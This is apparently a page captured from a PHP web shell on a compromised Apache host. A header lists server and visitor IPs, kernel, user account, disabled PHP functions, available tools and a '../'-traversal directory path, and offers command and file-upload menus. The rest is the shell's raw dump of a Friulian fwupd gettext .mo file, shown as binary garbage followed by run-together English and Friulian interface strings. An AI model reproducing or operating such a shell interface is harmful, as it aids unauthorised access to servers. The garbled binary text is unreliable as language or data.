Server IP : 192.168.23.10  /  Your IP : 3.143.239.189
Web Server : Apache
System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64
User : rrrallyteam ( 1049)
PHP Version : 8.1.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/../usr/share/locale/ro/../eo/../el/../cy/../tt/../pam/../kru/../fur/LC_MESSAGES/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/../usr/share/locale/ro/../eo/../el/../cy/../tt/../pam/../kru/../fur/LC_MESSAGES/fwupd.mo
���
-�",�"�"	##7#M#
Y#Yd#_�#4$S$f$�$�$'�$�$�$%%1%#=%-a%�%(�%6�%&+&"B&e&x&%�&�&�&#�&J�&DJ'2�'R�'9(0O(?�(D�(@)-F)Gt)A�)H�)1G*y**�*�*�*	�*4�*"+)+1+:+'J+r+�+�+�+�+�+�+	�+
�+�+,,0,F,5V,�,�,,�,(�,,
-:-C-_-w-�-2�- �-�-#.,.'F.n.t.#�. �.�.�.�./#/,/
H/V/3]/�/�/�/�/�/�/0.1
E1�S1!�1
�1	2 "2C2L2c22!�2�2�2�23313"F3i3�3�3�3�3�3�3�34!4R:4�4N�4�45!585V5g5x5�5S�56�6�63�6/�60*7&[7�7
�7�7'�7-�7"�78":8!]8/8�8%�8�8�8_9k9s9-�9/�9�9:/: N: o:�:�:�:�:�:;%;yB;�;�;�;`<q<	�<�<�<|�<*9= d=�=
�=y�=*>:>L>Y>a>�>��>�?�?��?
�@/�@0�@A$A
:AEAYA!yA
�A�A�A�A�A�A�A%B,BDB_B{B�B�B�B�B�B4�B'C8C=NC�C�C�C�C	�C�C�C�CDD9D,>DkD�D�D�D�D�D$�D�DEl/E�E�E�E�E�E!F".FQF%oF,�F�F
�F�F#�FG(%GNGmG
�G	�G)�G
�G�G�G�GH0(HYH+nH1�H�H�H�H	�HI3I
LIZIwI�I�I$�I"�I(�I*&JQJ7qJ*�J�J#�J K 0K&QK1xK.�K
�K&�K2L	AL*KLvL,�L�L"�L�L&M)/MYMuM)�M�M(�M%N@+N&lN�N
�N�N�N�N��N��OXPhPwP(�P�P�P�PQQQ$Q7+QZcR#�R�R,S�.S-�S<&TCcT+�TI�TU"U8UJU[UlU~U�U�U�U�U!�U&�U&!V3HV	|V�V�V�VE�V�V�V1WJWSWqW�Wu�W(X9XBX]XjXrX
�X$�X+�X
�X
�X{�XrY:�Y�Y
�Y�Y-[3[N[&`[�[�[
�[r�[p.\C�\�\&�\]"]'?]g]&�]�]%�]
�]=�]@"^"c^I�^K�^$_A_5a_�_ �_&�_�_`*1`t\`h�`H:au�aJ�a>DbM�bU�bI'c;qcV�cKdTPd6�d�d�d�de,e2eI:e8�e
�e�e
�e*�e
ff
;fIfZf
pf{f�f�f�f�f�fg.g3Cg0wg%�g4�g.h42hghth*�h�h�hR�h14i"fi4�i�i2�ij'jF;jB�j!�j�j�j$k3k :k[khkHpk�k �k	�kl%!l'Gl#olA�m�m��m:�n�n�n%�no o%<o3bo6�o �o-�o$pAp'Tp#|p5�p!�p.�p0'q'Xq�q�q�q�q�q�q_�qXr[qr�r"�r	s&(sOses"xs*�si�s0t�Et�t=u<Ru=�u,�u�u
v
v4$vDYv%�v)�v'�v&w4=w+rw*�w�w�wo�wOx*[x8�x<�x(�x#%y'Iy+qy'�y�y.�yz.z>z\z'zz��z;{'Z{%�{y�{'"|	J|T|d|�x|3�| /}#P}
t}�}~,~)@~j~w~�~��~�C1�L�
N�9\�;��ҁ߁
���.�&K�r���������ȂՂ2�)�)A�%k���+��
ۃ�%�*�GH�����`Ƅ#'�'K�s�(��
��Ņ̅
ԅ�3��0�88�(q�%����Ɇ���
�+�J��f��4�
9�D�"[�2~�0��!�*�+/�[�p�%�)��ω0�,�'G�o�
~�2����̊�%��#�9:�)t�'��;Ƌ��*�3�@�[Z���#̌��%�1@�,r�P��5�"&�FI�3��Ď/܎(�45�#j�@��>Ϗ�/�9N���2��+��0��4'�'\�&��0��$ܑ�-�M�#k�7��=ǒ8�>�F�U�u���������������*ŕ�
�-�B�U�^�q��}�y�(��"��=Θ��;�NH�W��8�Z(���������ԛ���;�
N�\�*v�/��-ќE��E�V�h��e����;�AC���#���� ў��Q��	՟'ߟ��$�3�-@�,n������ŠU�/Z�.��������iI.|
�q1G�C��	bAe��L&�c����Z�D7V>�n*��@od��s�m�R$�&�K�MP+���e^;3XjD�lU����i;�Jy%�?#F��u��a��|S�p[�
�.��KQhs8*�2���3��L�M�rG��u�4���tY-�~���"�� �8l9�(@��y���H#
b���XU�W7�r�VO`<J��}kh�!��z�NZ,ng"���6,^N����]��t~��1\?�Y��/��5���<v�j�B)aB���w���Q}	���E5�2�R-\H��A�{�0`6m�fP0�T:
$+W��Ig������� �!�_��'E�F����9�)k_c[�q'�x�OSf]{%o��:CT��4>�����=�(dz=wvp���x��/%.0f minute remaining%.0f minutes remaining%s Device Update%s Update%s is not currently updatable%s manufacturing mode%s override%s version%u device has a firmware upgrade available.%u devices have a firmware upgrade available.%u device is not the best known configuration.%u devices are not the best known configuration.%u local device supported%u local devices supportedA single GUIDGUIDAMD Firmware Write ProtectionActivate devicesActivate pending devicesActivate the new firmware on the deviceActivating firmware updateActivating firmware update forAgeAgree and enable the remote?Alias to %sAllow downgrading firmware versionsAllow reinstalling existing firmware versionsAllow switching firmware branchAn update requires a reboot to complete.An update requires the system to shutdown to complete.Answer yes to all questionsApply firmware updatesApply update even when not advisedApply update filesApplying update…Approved firmware:Approved firmware:Attach to firmware modeAuthenticating…Authentication details are requiredAuthentication is required to downgrade the firmware on a removable deviceAuthentication is required to downgrade the firmware on this machineAuthentication is required to modify BIOS settingsAuthentication is required to modify a configured remote used for firmware updatesAuthentication is required to modify daemon configurationAuthentication is required to read BIOS settingsAuthentication is required to set the list of approved firmwareAuthentication is required to sign data using the client certificateAuthentication is required to switch to the new firmware versionAuthentication is required to unlock a deviceAuthentication is required to update the firmware on a removable deviceAuthentication is required to update the firmware on this machineAuthentication is required to update the stored checksums for the deviceBIOS updates delivered via LVFS or Windows UpdateBYTESBlocked firmware files:Blocking firmware:Build a firmware fileCancelCancelledCannot apply as dbx update has already been applied.Cannot apply updates on live mediaChangedChecksumChoose the ESP:Clears the results from the last updateCommand not foundConvert a firmware fileDFU UtilityDebugging OptionsDecompressing…DescriptionDevice FlagsDevice IDDevice added:Device changed:Device is emulatedDevice is lockedDevice is unreachableDevice removed:Device software updates are provided for this device.Device stages updatesDevice update methodDevices that have been updated successfully:Devices that were not updated correctly:Devices with no available firmware updates: DisabledDisabled fwupdate debuggingDisables a given remoteDisplay versionDistributionDo not check if download remotes should be enabledDo not include log domain prefixDo not include timestamp prefixDo not perform device safety checksDo not prompt for devicesDo you want to refresh this remote now?Done!Downgrade %s from %s to %s?Downgrades the firmware on a deviceDowngrading %s from %s to %s... Downgrading %s…Download a fileDownloading…Dump SMBIOS data from a fileDurationESP specified was not validEmulated hostEnableEnable firmware update support on supported systemsEnable new remote?Enable this remote?EnabledEnabled fwupdate debuggingEnabled if hardware matchesEnables a given remoteEnabling this functionality is done at your own risk, which means you have to contact your original equipment manufacturer regarding any problems caused by these updates. Only problems with the update process itself should be filed at $OS_RELEASE:BUG_REPORT_URL$.Enabling this remote is done at your own risk.Encrypted RAMEncrypted RAM makes it impossible for information that is stored in device memory to be read if the memory chip is removed and accessed.Erase all firmware update historyErasing…Exit after a small delayExit after the engine has loadedFILENAMEFailed to apply updateFailed to connect to daemonFailed to get pending devicesFailed to install firmware updateFailed to load local dbxFailed to load quirksFailed to load system dbxFailed to lockFailed to parse argumentsFailed to parse fileFailed to parse flags for --filterFailed to parse local dbxFailed to rebootFailed to set splash modeFailed to validate ESP contentsFilenameFilename SignatureFilename SourceFilename requiredFirmware AttestationFirmware BIOS DescriptorFirmware BIOS Descriptor protects device firmware memory from being tampered with.Firmware BIOS RegionFirmware BIOS Region protects device firmware memory from being tampered with.Firmware Base URIFirmware Update D-Bus ServiceFirmware Update DaemonFirmware Updater VerificationFirmware UpdatesFirmware UtilityFirmware Write ProtectionFirmware Write Protection LockFirmware Write Protection protects device firmware memory from being tampered with.Firmware attestationFirmware metadata has not been updated for %u day and may not be up to date.Firmware metadata has not been updated for %u days and may not be up to date.Firmware updatesFirmware updates are not supported on this machine.Firmware updates are supported on this machine.Force the action by relaxing some runtime checksForce the action ignoring all warningsFoundGUIDGUIDsGet BIOS settingsGet all device flags supported by fwupdGet all devices that support firmware updatesGets details about a firmware fileGets the configured remotesGets the list of approved firmwareGets the list of blocked firmwareGets the list of updates for connected hardwareGets the releases for a deviceGets the results from the last updateIOMMUIOMMU ProtectionIOMMU Protection prevents connected devices from accessing unauthorized parts of system memory.Idle…Ignore validation safety checksInstall old version of signed system firmwareInstall old version of unsigned system firmwareInstall signed device firmwareInstall signed system firmwareInstall to parent device firstInstall unsigned device firmwareInstall unsigned system firmwareInstalling Firmware…Installing firmware update…Installing on %s…Intel BootGuardIntel BootGuard ACM ProtectedIntel BootGuard ACM protectedIntel BootGuard Error PolicyIntel BootGuard Error Policy ensures the device does not continue to start if its device software has been tampered with.Intel BootGuard OTP fuseIntel BootGuard Verified BootIntel BootGuard error policyIntel BootGuard prevents unauthorized device software from operating when the device is started.Intel BootGuard verified bootIntel CETIntel CET ActiveIntel CET EnabledIntel Control-Flow Enforcement Technology detects and prevents certain methods for running malicious software on the device.Intel Management Engine Manufacturing ModeIntel Management Engine OverrideIntel Management Engine VersionIntel SMAPIntel Supervisor Mode Access Prevention ensures critical parts of device memory are not accessed by less secure programs.Internal deviceInvalid argumentsIs downgradeKeyringLess than one minute remainingLinux Kernel LockdownLinux Kernel Lockdown mode prevents administrator (root) accounts from accessing and changing critical parts of system software.Linux Kernel Swap temporarily saves information to disk as you work. If the information is not protected, it could be accessed by someone if they obtained the disk.Linux Kernel VerificationLinux Kernel Verification makes sure that critical system software has not been tampered with. Using device drivers which are not provided with the system can prevent this security feature from working correctly.Linux SwapLinux Vendor Firmware Service (stable firmware)Linux Vendor Firmware Service (testing firmware)Linux kernelLinux kernel lockdownLinux swapList entries in dbxList supported firmware updatesList the available firmware typesLoading…MEI manufacturing modeMEI overrideMEI versionMetadata SignatureMetadata URIMinimum VersionModifies a daemon configuration valueModifies a given remoteModify a configured remoteModify daemon configurationMonitor the daemon for eventsNeeds rebootNew versionNo action specified!No downgrades for %sNo firmware IDs foundNo hardware detected with firmware update capabilityNo plugins foundNo releases availableNo remotes are currently enabled so no metadata is available.No remotes availableNo updatable devicesNo updates availableNo updates were appliedNot foundOKOK!Old versionOnly show single PCR valueOverride the default ESP pathPATHParse and show details about a firmware fileParsing dbx update…Parsing system dbx…PasswordPercentage completePlatform DebuggingPlatform debuggingPlease enter a number from 0 to %u: Pre-boot DMA ProtectionPre-boot DMA protectionPre-boot DMA protection prevents devices from accessing system memory after being connected to the computer.Print the version numberPrint verbose debug statementsPriorityProceed with upload?Processor Security ChecksQuery for firmware update supportRead a firmware blob from a deviceRead a firmware from a deviceRead firmware from device into a fileRead firmware from one partition into a fileReading from %s…Reading…Rebooting…Refresh metadata from remote serverReinstall %s to %s?Reinstall current firmware on the deviceReinstall firmware on a deviceReinstalling %s with %s... Release IDRemote IDReplace data in an existing firmware fileReport URIReported to remote serverRequest canceledRequires internet connectionRestart now?Restart the daemon to make the change effective?Restarting device…Return all the hardware IDs for the machineRun `fwupdmgr get-upgrades` for more information.SPI BIOS DescriptorSPI BIOS regionSPI lockSPI writeSPI write protectionSchedule installation for next reboot when possibleScheduling…See %s for more information.Selected deviceSelected volumeSet one or more BIOS settingsSet the debugging flag during updateSets the list of approved firmwareSettings will apply after system rebootsShare firmware history with the developersShow client and daemon versionsShow daemon verbose information for a particular domainShow debugging information for all domainsShow debugging optionsShow devices that are not updatableShow extra debugging informationShow history of firmware updatesShow the calculated version of the dbxShow the debug log from the last attempted updateShow the information of firmware update statusShutdown now?Sign data using the client certificateSign the uploaded data with the client certificateSignatureSpecify Vendor/Product ID(s) of DFU deviceSpecify the dbx database fileSpecify the number of bytes per USB transferStringSuccessfully activated all devicesSuccessfully disabled remoteSuccessfully downloaded new metadata: Successfully enabled and refreshed remoteSuccessfully enabled remoteSuccessfully installed firmwareSuccessfully modified configuration valueSuccessfully modified remoteSuccessfully refreshed metadata manuallySuccessfully updated device checksumsSuccessfully uploaded %u reportSuccessfully uploaded %u reportsSuccessfully verified device checksumsSummarySupported CPUSupported on remote serverSuspend To IdleSuspend To RAMSuspend to Idle allows the device to quickly go to sleep in order to save power. While the device has been suspended, its memory could be physically removed and its information accessed.Suspend to RAM allows the device to quickly go to sleep in order to save power. While the device has been suspended, its memory could be physically removed and its information accessed.Suspend-to-idleSuspend-to-ramSwitch branch from %s to %s?Switch the firmware branch on the deviceTPM PCR0 reconstructionTPM Platform ConfigurationTPM ReconstructionTPM empty PCRsTPM v2.0TagTagsTargetThe LVFS is a free service that operates as an independent legal entity and has no connection with $OS_RELEASE:NAME$. Your distributor may not have verified any of the firmware updates for compatibility with your system or connected devices. All firmware is provided only by the original equipment manufacturer.The UEFI Platform Key is used to determine if device software comes from a trusted source.There are no blocked firmware filesThere is no approved firmware.This program may only work correctly as rootThis remote contains firmware which is not embargoed, but is still being tested by the hardware vendor. You should ensure you have a way to manually downgrade the firmware if the firmware update fails.This system doesn't support firmware settingsThis tool allows an administrator to apply UEFI dbx updates.This tool allows an administrator to debug UpdateCapsule operation.This tool can only be used by the root userThis tool will read and parse the TPM event log from the system firmware.TypeUEFI Firmware UtilityUEFI Platform KeyUEFI Secure BootUEFI dbx UtilityUEFI platform keyUEFI secure bootUnable to connect to serviceUnblocking firmware:UnknownUnknown DeviceUnlock the device to allow accessUnlocks the device for firmware accessUnset the debugging flag during updateUnsupported daemon version %s, client version is %sUpdatableUpdate ErrorUpdate ImageUpdate StateUpdate failure is a known issue, visit this URL for more information:Update now?Update requires a rebootUpdate the stored device verification informationUpdatingUpdating %s from %s to %s... Updating %s…Upgrade %s from %s to %s?Uploading firmware reports helps hardware vendors to quickly identify failing and successful updates on real devices.Use quirk flags when installing firmwareUsernameValidating ESP contents…Verifying…VersionVersion[fwupd]Waiting…Write firmware from file into deviceWrite firmware from file into one partitionWriting file:Writing…Your distributor may not have verified any of the firmware updates for compatibility with your system or connected devices.command-argumentGUIDcommand-descriptionSign data using the client certificatefwupd TPM event log utilityfwupd pluginsProject-Id-Version: fwupd
Report-Msgid-Bugs-To: 
Language-Team: Friulian (http://app.transifex.com/freedesktop/fwupd/language/fur/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: fur
Plural-Forms: nplurals=2; plural=(n != 1);
Al mancjie %.0f minûtA mancjin %.0f minûtsInzornament dispositîf %sInzornament di %sPal moment nol è pussibil inzornâ %sModalitât costrutôr %sOverride %sVersion di %s%u dispositîf al à un inzornament firmware disponibil.%u dispositîfs a àn un inzornament firmware disponibil.%u dispositîf no e la miôr configurazion cognossude.%u dispositîfs no son la miôr configurazion cognossude.%u dispositîf locâl supuartât%u dispositîfs locâi supuartâtsGUIDProtezion de scriture dal firmware AMDAtive dispositîfsAtive dispositîfs in spieteAtive il gnûf firmware sul dispositîfAtivazion inzornament firmwareAtivazion dal inzornament firmware parEtâtAcetâ e abilitâ la sorzint esterne?Alias a %sPermet di tornâ indaûr aes versions di firmware precedentisPermet di tornâ a instalâ lis versions dal firmware esistentisPermet di cambiâ ram dal firmwareUn inzornament al à bisugne che si torni a inviâ il computer par finî.Un inzornament, par completâsi, al à bisugne che si distudedi il sisteme.Rispuint di sì a dutis lis domandisApliche i inzornaments firmwareApliche l'inzornament ancje cuant che nol è conseâtApliche i files di inzornamentDaûr a aplicâ l'inzornament…Firmware aprovât:Firmware aprovâts:Zonte ae modalitât firmwareDaûr a autenticâ…I detais de autenticazion a son necessarisLa autenticazion e je necessarie par tornâ indaûr ae version precedente dal firmware suntun dispositîf estraibil La autenticazion e je necessarie par tornâ indaûr ae version precedente dal firmware su cheste machineLa autenticazion e je necessarie par modificâ lis impostazions dal BIOSLa autenticazion e je necessarie par modificâ une sorzint esterne configurade, doprade pai inzornaments dal firmwareLa autenticazion e je necessarie par modificâ la configurazion dal demoniLa autenticazion e je necessarie par lei lis impostazions BIOSLa autenticazion e je necessarie par stabilî la liste dai firmware aprovâtsLa autenticazion e je necessarie par firmâ i dâts doprant il certificât dal clientLa autenticazion e je necessarie par passâ ae gnove version dal firmwareLa autenticazion e je necessarie par sblocâ un dispositîfLa autenticazion e je necessarie par inzornâ il firmware suntun dispositîf estraibilLa autenticazion e je necessarie par inzornâ il firmware su cheste machineLa autenticazion e je necessarie par inzornâ i checksum archiviâts pal dispositîfInzornaments BIOS dâts fûr vie LVFS o Windows UpdateBYTESFiles di firmware blocâts:Firmware blocât:Compile un file di firmwareAnuleAnulâtImpussibil aplicâ viodût che l'inzornament dbx al è za stât aplicât.Impussibil aplicâ i inzornaments su supuarts “live”ModificâtChecksumSielç l'ESP:Al nete i risultâts dal ultin inzornamentComant no cjatâtConvertìs un file di firmwareUtilitât DFUOpzions di debugDaûr a decomprimi…DescrizionVariabilis/flags dispositîfID dispositîfDispositîf zontât:Dispositîf modificât:Il dispositîf al è emulâtIl dispositîf al è blocâtImpussibil rivâ al dispositîfDispositîf gjavât:Su chest dispositîf a son dâts fûr inzornaments.Il dispositîf al apliche i inzornaments a tapisMetodi di inzornament dal dispositîfDispositîfs che a son stâts inzornâts cun sucès:Dispositîfs che no son stâts inzornâts ben:Dispositîfs cence inzornaments firmware disponibii:DisabilitâtDisabilite il debug di fwupdateAl disabilite une sorzint esterne indicadeVisualize la versionDistribuzionNo sta controlâ se lis sorzint esternis dal discjariament a àn di sei abilitadisNo sta includi il prefìs il domini dal regjistriNo sta includi il prefìs date/oreNo sta eseguî i controi di sigurece dal dispositîfNo sta domandâ dispositîfsDesideristu inzornâ cheste sorzint esterne cumò?Fat!Puartâ indaûr %s de version %s ae %s?Al torne indaûr ae version precedente dal firmware suntun dispositîfDaûr a tornâ indaûr ae version precedente di %s de %s ae %s... Daûr a degradâ di version %s…Discjame un fileDaûr a discjariâ…Scrîf jù i dâts SMBIOS di un fileDuradeL'ESP specificât nol jere valitHost emulâtAbiliteAbilite il supuart dal inzornament dal firmware sui sistemis supuartâtsAbilitâ gnove sorzint esterne?Abilitâ cheste sorzint esterne?AbilitâtAbilite il debug di fwupdateAbilitât se l'hardware al corispuintAl abilite une sorzint esterne indicadeSi abilite cheste funzionalitât a propri pericul, che al significhe che, par ogni probleme causât di chescj inzornaments, si à di contatâ il produtôr origjinâl dal imprest. Dome i problemis che si àn cul sôl procès di inzornament a àn di sei inviâts a $OS_RELEASE:BUG_REPORT_URL$.La abilitazion di cheste sorzint esterne e ven fate a to pericul.RAM cifradeLa RAM cifrade e fâs in mût che al sedi impussibil lei lis informazions archiviadis te memorie dal dispositîf, se il banc di memorie al ven gjavât e doprât.Scancele dute la cronologjie dai inzornaments dal firmwareDaûr a scancelâ…Jes dopo un piçul ritartJes dopo che il motôr al à cjariâtNONFILEImpussibil aplicâ l'inzornamentNo si è rivâts a conetisi al demoniNo si è rivâts a otignî i dispositîfs in spieteNo si è rivâts a instalâ l'inzornament dal firmwareImpussibil cjariâ il dbx locâlImpussibil cjariâ lis soluzions alternativisImpussibil cjariâ il dbx di sisteme Impussibil blocâNo si è rivâts a analizâ i argomentsNo si è rivâts a analizâ il fileImpussibil analizâ lis variabilis/flags par --filterImpussibil analizâ il dbx locâl No si è rivâts a tornâ a inviâ il sistemeNo si è rivâts a stabilî la modalitât splashImpussibil convalidâ i contignûts ESPNon fileFirme non fileSorzint dal non di fileNon di file necessariAttestazion firmwareDescritôr BIOS dal firmwareIl Descritôr BIOS dal firmware al protêç des modifichis la memorie firmware dal dispositîf.Regjon BIOS dal firmwareLa Regjon BIOS dal firmware e protêç des modifichis la memorie firmware dal dispositîf .URI de base dal firmwareServizi D-Bus inzornament firmwareDemoni di inzornament firmwareVerifiche dal inzornadôr dal firmwareInzornaments firmwareUtilitât firmwareProtezion di scriture dal firmwareBloc di protezion de scriture dal firmwareLa protezion de scriture dal firmware e protêç des modifichis la memorie dal firmware dai dispositîfs.Attestazion firmwareI metadâts dal firmware no son stâts inzornâts par %u zornade e a podaressin jessi vielis.I metadâts dal firmware no son stâts inzornâts par %u dîs e a podaressin jessi vielis.Inzornaments firmwareSu cheste machine no son supuartâts i inzornaments firmware.Su cheste machine a son supuartâts i inzornaments firmware.Sfuarce la azion smolant cualchi control in timp di esecuzionSfuarce la azion ignorant ducj i avertimentsCjatâtGUIDGUIDsOten impostazions BIOSOten dutis lis variabilis/flags supuartadis di fwupdOten ducj i dispositîfs che a supuartin i inzornaments dal firmwareAl oten detais su un file di firmwareAl oten lis sorzint esternis configuradisAl oten la liste dai firmware aprovâtsAl oten la liste dai firmware blocâtsAl oten la liste di inzornaments pal hardware tacâtAl oten lis publicazions par un dispositîfAl oten i risultâts dal ultin inzornamentIOMMUProtezion IOMMULa Protezion IOMMU e impedìs ai dispositîfs colegâts di acedi a parts no autorizadis de memorie dal sisteme.In polse…Ignore la covalide dai controi di sigureceInstale la version vecje dal firmware di sisteme firmâtInstale la version vecje dal firmware di sisteme cence firmeInstasle firmware di dispositîf firmâtInstale firmware di sisteme firmâtInstale prime sul dispositîf gjenitôrInstale firmware di dispositîf cence firmeInstale firmware di sisteme cence firmeDaûr a instalâ il firmware…Daûr a instalâ l'inzornament dal firmware…Daûr a instalâ su %s…Intel BootGuardACM protet di Intel BootGuardACM protet di Intel BootGuardPolitiche sui erôrs di Intel BootGuardLa Politiche sui erôrs di Intel BootGuard e garantìs che il dispositîf nol continui a inviâsi se il software dal dispositîf al è stât modificât.Fusibil OTP di Intel BootGuardInviament verificât di Intel BootGuardPolitiche di erôr di Intel BootGuardIntel BootGuard al impedìs al software di dispositîfs no-autorizâts dal operâ cuant che il dispositîf al è inviât.Inviament verificât di Intel BootGuardIntel CETIntel CET atîfIntel CET abilitâtIntel Control-Flow Enforcement Technology al rileve e al impedìs cierts metodis di esecuzion di software malevul sul dispositîf.Modalitât di produzion dal Intel Management EngineIntel Management Engine OverrideVersion dal Intel Management EngineIntel SMAPIntel Supervisor Mode Access Prevention al garantìs che i programs mancul sigûrs no podedin doprâ ciertis parts critichis de memorie dal dispositîf.Dispositîf interniArgoments no valitsAl è pussibil puartâ indaûr di versionPuarteclâfsAl mancje mancul di un minûtLockdown dal kernel LinuxLa modalitât Lokdown dal Kernel Linux e impedìs ai accounts dai aministradôrs (root) di acedi e cambiâ parts critichis dal software di sisteme.Il Swap dal kernel Linux, vâl a dî la memorie di scambi, e salve in mût temporani informazions su disc intant che tu lavoris. Se lis informazions no son protetis, cualchidun al podarès acedi a chestis informazions se al oten il disc.Verifiche dal kernel LinuxLa verifiche dal kernel Linux e garantìs che il software critic di sisteme nol sedi modificât. Se a vegnin doprâts dirvers di dispositîf che no son stâts dâts fûr cul sisteme, al è pussibil impedî di lavorâ ben a cheste funzionalitât di sigurece.Swap di LinuxServizi Firmware dal vendidôr di Linux (firmware stabil)Servizi Firmware dal vendidôr di Linux (firmware di prove)Kernel LinuxLockdown dal kernel LinuxSwap di LinuxVôs de liste in dbxListe dai inzornaments di firmware supuartâtsListe i gjenars di firmware disponibiiDaûr a cjariâ…Modalitât costrutôr MEIOverride MEIVersion MEIFirme metadâtsURI metadataVersion minimeAl modifiche un valôr di configurazion dal demoniAl modifiche une sorzint esterne indicadeModifiche une sorzint esterne configuradeModifiche la configurazion dal demoniMonitore il demoni pai events Al necessite di tornâ a inviâ il sistemeGnove versionNissune azion specificade!Nissune degradazion di version par %sNissun ID di firmware cjatâtNissun hardware rilevât un funzionalitâts di inzornament dal firmwareNissun plugin cjatâtNissune publicazion disponibileIn chest moment no je abilitade nissune sorzint esterne duncje nissun metadât al è disponibil.Nissune sorzint esterne disponibileNissun dispositîf che si pues inzornâNissun inzornament disponibilNol è stât aplicât nissun inzornamentNo cjatâtVa benVa ben!Version vecjeMostre dome il valôr PCRPasse parsore al valôr dal percors ESP predefinîtPERCORSAnalize e mostre i detais in merit a un file di firmwareDaûr a analizâ l'inzornament di dbx…Daûr a analizâ il dbx di sisteme…PasswordPercentuâl di completamentDebug de plateformeDebug de plateformeInserìs un numar di 0 a %u: Protezion DMA di pre-inviamentProtezion DMA pre-inviamentLa protezion DMA di pre-inviament e impedìs ai dispositîfs di acedi ae memorie di sisteme dopo che si son colegâts al computer.Stampe il numar de versionStampe lis declarazions di debug in maniere prolissePrioritâtProcedi cul inviament?Controi di sigurece dal processôrInterogazion pal supuart dai inzornaments firmwareLei di un dispositîf un file binari di firmwareLei di un dispositîf un firmwareLei il firmware dal dispositîf intun fileLei il firmware di une partizion intun fileDaûr a lei di %s…Daûr a lei…Daûr a tornâ a inviâ il sisteme…Inzorne i metadâts dal servidôr esterniTornâ a instalâ %s %s? Torne instale il firmware atuâl sul dispositîfTorne instale un firmware suntun dispositîfDaûr a tornâ a instalâ %s cun %s... ID publicazionID esterniSostituìs i dâts intun file di firmware esistentURI segnalazionSegnalât su servidôr esterniRichieste anuladeAl à bisugne de conession a internetTornâ a inviâ cumò?Tornâ a inviâ il demoni par rindi efetive la modifiche?Daûr a tornâ a inviâ il dispositîf…Torne ducj i ID dal hardware pe machineEseguìs `fwupdmgr get-upgrades` par vê plui informazions.Descritôr dal BIOS SPIRegjon BIOS SPIBloc SPIScriture SPIProtezion de scriture SPIPlanifiche la instalazion pe volte sucessive che si torne a inviâ cuant che al è pussibilDaûr a planificâ…Viôt %s par vê plui informazions.Dispositîf selezionâtVolum selezionâtConfigure une o plui impostazion BIOSStabilìs la opzion di debug dilunc l'inzornamentAl stabilìs la liste dai firmware aprovâtsLis impostazions a vignaran aplicadis daspò che il sisteme si tornarà a inviâCondivît la conologjie dai firmware cui svilupadôrsMostre versions di client e demoniMostre lis informazions prolissis dal demoni par un domini particolârMostre lis informazions di debug par ducj i dominisMostre opzions di debugMostre i dispositîfs che no si puedin inzornâMostre informazions di debug adizionâlsMostre la cronologjie dai inzoronaments dal firmwareMostre la version calcolade dal dbxMostre il regjistri dal debug dal ultin tentatîf di inzornamentMostre lis informazions sul stât dal inzornament dal firmwareDistudâ cumò?Firme i dâts doprant il certificât dal clientFirme i dâts cjamâts in rêt cul certificât dal clientFirmeSpecifiche Vendidôr/ID prodot dal dispositîf DFUSpecifiche il file de base di dâts dal dbxSpecifiche il numar di byte par trasferiment USBStringheDucj i dispositîfs a son stâts ativâts cun sucèsSorzint esterne disabilitade cun sucèsGnûf metadât discjariât cun sucès:Sorzint esterne inzornade e abilitade cun sucèsSorzint esterne abilitade cun sucèsFirmware instalât cun sucèsValôr di configurazion modificât cun sucèsSorzint modificade cun sucèsMetadât inzornât a man cun sucèsSumis di control dai dispositîfs inzornadis cun sucès%u rapuart inviât cun sucès%u rapuarts inviâts cun sucèsSumis di control dai dispositîfs verificadis cun sucèsSintesiCPU supuartadeSupuartât su servidôr esterniSospension su inativitâtSospension su RAMSospension su inativitât al permet al dispositîf di lâ in polse subite, cussì di sparagnâ energjie. Intant che il dispositîf al è sospindût, al è pussibil gjavâ in mût fisic il banc di memorie, e chest doprât par acedi aes informazions.La sospension su RAM e permet al dispositîf di lâ in polse subite, cussì di sparagnâ energjie. Intant che il dispositîf al è sospindût, al è pussibil gjavâ in mût fisic il banc di memorie, e chest doprât par acedi aes informazions.Suspend-to-idleSuspend-to-ramCambiâ ram di %s a %s? Cambie il ram dal firmware sul dispositîfRicostruzion di PCR0 dal TPMConfigurazion de plateforme TPMRicostruzion dal TPMPCRs vueits di TPMTPM v2.0EticheteEtichetisDestinazionIl LVFS — Servizi firmware dal vendidôr di linux — al è un servizi gratuit che al opere come entitât legâl indipendente e no à conession cun $OS_RELEASE:NAME$. Il to distributôr al podarès no vê verificât la compatibilitât di nissun dai inzornaments firmware cul vuestri sisteme o cui dispositîfs tacâts. Ducj i firmware a son furnîts dome dal produtôr origjinâl dal imprest.La clâf de plateforme UEFI e ven doprade par determinâ se il software dal dispositîf al rive di une sorzint afidabile.No'nd è nissun file di firmware blocâtNo'nd è nissun firmware aprovât.Chest program al pues lavorâ in maniere juste dome come rootCheste sorzint esterne e conten firmware che no son sot di embargo, ma a son ancjemò in prove dal vendidôr dal hardware. Tu varessis di sigurâti di vê une maniere par puartâ indaûr a man il firmware ae version precedente, se l'inzornament al falìs.Chest sisteme nol supuarte lis configurazions dai firmwaresChest imprest al permet a un aministradôr di aplicâ i inzornaments dbx UEFI.Chest imprest al permet a un aministradôr di fâ il debug de operazion UpdateCapsule .Chest strument al pues jessi doprât dome dal utent rootChest strument al leiarà e al analizarà il regjistri events TPM dal firmware di sisteme.GjenarUtilitât Firmware UEFIClâf de plateforme UEFIInviament sigûr di UEFIUtilitât dbx di UEFIClâf de plateforme UEFIInviament sigûr di UEFIImpussibil conetisi al serviziFirmware sblocât:No cognossûtDispositîf no cognossûtSbloche il dispositîf par permeti l'acèsAl sbloche il dispositîf pal acès al firmwareGjave la opzion di debug dilunc l'inzornamentVersion %s dal demoni no supuartade, la version dal client e je la %sSi pues inzornâErôr inzornamentImagjin di inzornamentStât inzornamentIl faliment dal inzornament al è un probleme cognossût, visite chest URL par vê plui informazions:Inzornâ cumò?Pal inzornament al è necessari tornâ a inviâ il computerInzorne lis informazions di verifiche dal dispositîf archiviadisDaûr a inzornâDaûr a inzornâ %s di %s a %s... Daûr a inzornâ %s…Inzornâ %s de version %s ae %s?Inviâ i rapuarts dal firmware al jude i vendidôrs di 